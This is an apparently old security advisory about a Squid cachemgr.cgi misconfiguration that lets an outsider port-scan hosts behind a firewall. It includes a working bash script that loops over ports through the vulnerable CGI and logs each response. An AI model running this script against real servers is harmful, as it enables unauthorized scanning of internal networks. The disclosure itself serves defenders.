cachemgr.cgi (squid 2.3STABLE4)

[Francisco Sáa Muñoz <fsaa () ip6seguridad com>]

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated:        Linux Redhat 6.2
                                                Squid 2.3STABLE4
                                                Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration on Apache and Squid Is posible to use
cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.

...also we can gater a lot information about the navegation,
configuration...

...also there is a lot code with bad programmer habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
# Coded by Francisco Sáa Muñoz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1

done
--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco Sáa Muñoz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--

]-* [IP6] EOF